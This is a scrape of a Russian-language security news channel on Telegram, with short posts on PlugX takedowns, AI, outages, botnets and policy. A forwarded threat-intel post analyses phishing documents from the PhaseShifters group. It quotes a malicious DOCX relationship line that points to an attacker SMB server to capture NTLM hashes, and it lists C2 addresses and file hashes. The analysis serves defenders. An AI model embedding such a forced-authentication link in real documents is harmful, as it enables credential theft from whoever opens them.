Telegram Web
4200 компьютеров под управлением PlugX: ФБР вмешалось

👮‍♀️ ФБР провело специальную операцию по удалению вредоносного ПО PlugX с 4200 компьютеров в США. Вредонос использовался хакерской группой «Mustang Panda» для кражи данных и удалённого доступа к системам жертв.

🕷 Вредоносная программа распространялась через USB-накопители и действовала с 2012 года, атакуя компьютеры по всему миру. По данным ФБР, только с сентября 2023 года около 45 000 IP-адресов в США обращались к командному серверу вредоноса.

⚡️ В ходе операции ФБР использовало собственные механизмы вредоноса для его деактивации, работая совместно с французскими правоохранителями. Специальное командное сообщение заставило PlugX удалить все созданные файлы и полностью прекратить работу.

#PlugX #кибератака #ФБР #кибербезопасность

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
ИИ против программистов: планы Meta на 2025 год

🤖 В подкасте The Joe Rogan Experience Марк Цукерберг сообщил о разработке ИИ для замены инженеров среднего звена. «Вероятно, в 2025 году у нас в Meta*, как и у других компаний, работающих в этом направлении, появится ИИ, который фактически сможет выполнять роль инженера среднего звена и писать код», — заявил он.

💰 Текущая средняя зарплата инженеров среднего звена в Meta составляет несколько сотен тысяч долларов в год. Хотя Цукерберг не говорит напрямую о сокращении персонала, его заявление намекает на возможные изменения для разработчиков.

👀 Глава Meta отметил, что в будущем большая часть кода будет создаваться ИИ-инженерами, а не людьми. При этом он подчеркнул, что новая технология скорее дополнит специалистов, позволив им заниматься «более смелыми задачами».

* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.

#Meta #ИИ #программисты #будущее

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ESCalator
Ваш хеш, пожалуйста… Спасибо! 🙏

В начале января мы обнаружили файл, который привлек внимание своим содержанием и структурой. Исследование метаданных документа, а также используемых техник соединения с сервером по протоколу SMB через DOCX-файлы позволило установить связь с хакерской группировкой PhaseShifters. Информацию о ней мы публиковали в статье в ноябре 2024 года (рисунок 1). В этой статье также подробно описаны взаимосвязи с группировкой UAC-0050, о которой пойдет речь далее.

🆕 С2-сервер новый, подход старый

Первый файл, про который хочется поговорить, — декой. Он содержит фотографию (рисунок 2) документа, якобы принадлежащего одной компании в сфере военно-промышленного комплекса (создание БПЛА).

Как и в предыдущих атаках, внутри документа есть ссылка-шаблон, с помощью которой происходит получение хеш-сумм NTLM пользователя. Такая техника называется Forced Authentication: посредством шаблона или взаимосвязей с внешними сущностями устройство устанавливает соединение с сервером злоумышленников по протоколу SMB, из-за чего Windows автоматически пытается провести аутентификацию на этом ресурсе.

В файле присутствует обращение к SMB-ресурсу на внешнем сервере 45.155.249.126. Активность сервера наблюдается с ноября 2024 года, соединение происходит через механизм связей (relations) частей WordprocessingML-документа:

<ns0:Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file://\\45.155.249.126\19i6LJ4qNx81SkAFg4mtUbf5.png" TargetMode="External" /></ns0:Relationships>


👤 Поискав другие файлы, связанные с этим IP-адресом, мы выявили еще несколько документов-приманок для атак на организации (рисунки 3–5). Кроме того, стоит отметить важную деталь: в метаданных указано имя пользователя, создавшего или последним изменившего документ, — kib vol.

Наличие связи с внешним SMB-сервером, а также уникальные метаданные позволили зацепиться за еще один файл, который, в свою очередь, связывался с другим IP-адресом (31.214.157.167) злоумышленников — АО-******- -12904ДО.docx. Этот документ был задействован в атаках с использованием Ozone RAT и Darktrack RAT, которые также описаны у нас в статье (рисунок 1).

Просмотрев подсеть 31.214.157.0/24, можно определить как минимум еще один IP-адрес, который замечен в подобных инцидентах, — 31.214.157.49. Этот сервер задействовался в атаках как PhaseShifters (например, ГВПК ответ цифровому развитию.docx), так и UAC-0050 (с использованием домена tax-gov-ua.com). Напомним, что сходства этих двух группировок все еще требуется тщательно исследовать.

IoCs

С2-серверы:

45.155.249.126
31.214.157.167
31.214.157.49


SHA-256:

3172bf0dd76232fc633214f0ba92b25d27b136a2ed5d9e4e7d06b0686ef4d34c
3eca76737c6aee34b4c38845fde13bceed23a31d39e958893a44f42380ff84d5
fd50307b7f08d037c5d37f2505c8de6edc9c57e1843f4434309a135f4b43ff5c
5061e83a380a9c3ebe91bd5de80fe8f11b666a182efbebe13a1b0dfbc2842487


#TI #C2 #ioc #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️В режиме ожидания: 21 регион России столкнулся с проблемами интернета

🔌 В Татарстане произошел обрыв магистрального кабеля на участке между населенными пунктами Тюлячи и Новая Тура. Это привело к деградации услуг ШПД и ухудшению качества интернет-соединения для примерно 3,8 млн пользователей в 21 регионе России.

По информации Роскомнадзора, ориентировочное время полного восстановления связи — 21:00 по московскому времени. Точный перечень затронутых регионов ведомство не раскрыло.

⚡️ Этот сбой стал вторым крупным инцидентом за последние сутки. Накануне пользователи разных операторов жаловались на недоступность сайтов и мобильных приложений, что Роскомнадзор связал с кратковременным нарушением связности в Рунете.

#интернетсбой #Татарстан #РКН #цифроваяинфраструктура

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ SourceCraft: экосистема разработки с российской пропиской

🚀«Яндекс» планирует в феврале запустить в режиме технического превью платформу SourceCraft , аналог американской GitLab. Первым инструментом станет Yandex Code Assistant — ИИ-помощник для написания кода.

🛠 Платформа предложит полный набор инструментов для разработки, включая систему контроля версий и CI/CD. SourceCraft объединит все необходимые средства для безопасной разработки, аудита и мониторинга проектов в едином интерфейсе.

🌍 GitLab ранее широко использовался для совместной разработки, но с 2019 года ограничил доступ для сотрудников из России и Китая. В 2022 году сервис полностью прекратил работу с новыми бизнесами из России и Белоруссии.

#SourceCraft #Яндекс #разработка #GitLab

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram под наблюдением: ИИ раскрывает авторов сообщений

🔍 Российский разработчик создал обновленную версию ИИ-инструмента Apparatus Sapiens для анализа контента в Telegram. Система способна не только находить потенциально опасные сообщения, но и определять их авторов, анализируя более 22 миллионов чатов.

🤖 Инструмент использует продвинутые алгоритмы для оценки «окраса» сообщений и выявления признаков противоправной деятельности. После обнаружения подозрительного контента система может провести деанонимизацию автора, определив его геолокацию, телефонный номер и другие идентификаторы.

📊 База данных системы содержит информацию о 58 миллионах пользователей Telegram, включая их телефонные номера. В случае если точная идентификация невозможна, система выгружает полную историю сообщений пользователя, изменений его профиля и связей для последующего ручного анализа.

#ИскусственныйИнтеллект #Безопасность #Telegram #АнализДанных

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝 Как наладить взаимодействие ИБ и IT?

«Да кому сдалось нас атаковать?» — часто слышите такое от коллег? Споры между ИБ и IT — одна из причин, почему уязвимости остаются неустраненными.

На практикуме «Управление уязвимостями: от теории к практике» вы узнаете:

🔴Как строить диалог между ИБ и IT так, чтобы задачи решались, а не откладывались;
🔴Как распределять роли в процессе управления уязвимостями;
🔴Какие инструменты и подходы использовать, чтобы наладить взаимодействие внутри команды.

Разберите эту головоломку на практикуме и получите рабочие инструменты для ее решения.

✍️ Записаться на практикум
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ OpenText Corporation объявлена нежелательной в России

🔍 Генпрокуратура РФ признала канадскую OpenText Corporation нежелательной организацией. Компания обвиняется в тесном сотрудничестве с силовыми структурами США и участии в антироссийской пропагандистской кампании.

🛡 OpenText Corporation владеет популярным SIEM-продуктом ArcSight, который широко использовался в российских компаниях. Решение применялось для защиты IT-инфраструктуры и мониторинга инцидентов безопасности.

⚠️ Компания прекратила свою деятельность в России еще в марте 2022 года. Среди известных клиентов OpenText были такие компании как L'Oreal и Heineken.

#кибербезопасность #SIEM #ArcSight #OpenText

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ Тысячи роутеров MikroTik стали частью вредоносной сети

✔️ Специалисты Infoblox обнаружили сеть из 13 000 скомпрометированных маршрутизаторов MikroTik. Злоумышленники использовали эти устройства для рассылки фишинговых писем, маскируясь под DHL Express.

😵‍💫 Атакующие эксплуатировали уязвимость в настройках SPF-записей с параметром «+all», затронувшую около 20 000 доменов. Эта ошибка конфигурации позволяла любому серверу отправлять письма от имени легитимных доменов.

‼️Зараженные устройства использовались как прокси-серверы SOCKS4 для проведения DDoS-атак и кражи данных. Летом 2024 года этот ботнет уже был замечен в рекордной DDoS-атаке мощностью 840 Mpps на инфраструктуру OVHcloud.

#кибербезопасность #MikroTik #ботнет #фишинг

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ Указ Байдена меняет стандарты кибербезопасности США

💼 Президент США Джо Байден подписал указ, направленный на усиление кибербезопасности. Документ расширяет полномочия федеральных агентств и вводит новые требования для IT-подрядчиков. Особое внимание уделено защите критической инфраструктуры, включая школы, больницы и энергетический сектор.

💻 Документ обязывает компании, работающие с правительством, следовать высоким стандартам безопасности. Национальный институт стандартов и технологий займётся разработкой методик проверки соответствия. Без выполнения этих требований поставщики ПО не смогут участвовать в государственных закупках.

🤖Искусственный интеллект и квантовые технологии станут частью новых мер. ИИ будет использоваться для поиска и устранения уязвимостей, а алгоритмы устойчивой криптографии защитят федеральные системы. Указ также упрощает процесс наложения санкций на киберпреступников.

#кибербезопасность #США #указБайдена #цифроваязащита

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🌑 Что скрывает темная сторона интернета?

Прольем свет на темную сторону интернета

Дарквеб для хакеров — это не просто набор анонимных сайтов, а разветвленная экосистема, где свои правила, инструменты и экономика. Здесь продается все — от вредоносного ПО до доступа к системам, — а конкуренция может быть жестче, чем в легальном бизнесе.

На вебинаре мы впервые расскажем, как на самом деле устроен рынок киберпреступности.

Обсудим:

🔴механизмы проведения сделок в дарквебе;
🔴экономику угроз: цены и тренды на вредоносное ПО, эксплойты, доступы и услуги;
🔴методы конкуренции: почему отзывы важны, как рекламные акции влияют на популярность и зачем некоторые продавцы создают кастомизированные лендинги;
🔴будущее дарквеба.

Ждем вас на вебинаре! Регистрация обязательна.
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ «Госуслуги» станут спасательным кругом: новая кнопка SOS уже на подходе

🆘 Минцифры России поддержало инициативу депутата Дмитрия Гусева о добавлении кнопки экстренной помощи на портале «Госуслуги». Новая функция будет работать по аналогии с номером «112», обеспечивая прямую связь с экстренными службами.

🔄 В Курской области уже были апробированы сервисы для чрезвычайных ситуаций, включая поиск пропавших и запрос эвакуации. Этот опыт ляжет в основу типового решения для всех регионов России.

⚡️Для реализации проекта потребуется модернизация информационных систем МЧС, МВД, ФСБ, Росгвардии и Минздрава. Также будут разработаны специальные алгоритмы действий для каждого ведомства при получении сигналов через новую систему.

#Госуслуги #Безопасность #ЦифровизацияРоссии #ЭкстреннаяПомощь

@SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ FreeOurFeeds: спасение соцсетей от миллиардеров

🔍 Цель проекта — создание независимой экосистемы социальных платформ. Группа культурных деятелей и экспертов запускает инициативу FreeOurFeeds на базе протокола AT для децентрализации данных.

🌟 Участники — Марк Руффало, Алекс Уинтер, Кори Доктороу и другие. К проекту присоединились писатели, музыканты и основатели ключевых интернет-ресурсов, таких как Википедия.

💰 План — собрать 30 млн долларов за три года. Первым этапом стал краудфандинг через GoFundMe для формирования общественного фонда.

Когда богатые спасают интернет от ещё более богатых, это похоже на сюжет из антиутопии. Но вдруг они на этот раз действительно перепишут правила игры?


#интернет #технологии #соцсети #FreeOurFeeds @SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🕵‍♂️ Запрет TikTok в США: между безопасностью и цифровой цензурой

📉 США официально заблокировали TikTok, назвав его угрозой безопасности. Верховный суд поддержал решение, вызвавшее волну протестов, особенно среди молодых пользователей.

💡 TikTok изменил моду, музыку, еду и образование. Алгоритмы платформы подстроились под вкусы миллионов, создавая тренды и культурные феномены.

🔐 Цензура вместо свободы слова? Запрет вызвал вопросы о демократических принципах, ведь TikTok был не только площадкой для развлечений, но и для выражения идей.

В попытке защититься от "китайской угрозы" США невольно позаимствовали любимый метод Поднебесной - просто взять и запретить все, что кажется подозрительным.

#TikTok #конфиденциальность #нацбезопасность #цифроваяэтика @SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
Channel photo removed
Channel photo updated
2025/01/20 01:02:43
Back to Top
HTML Embed Code: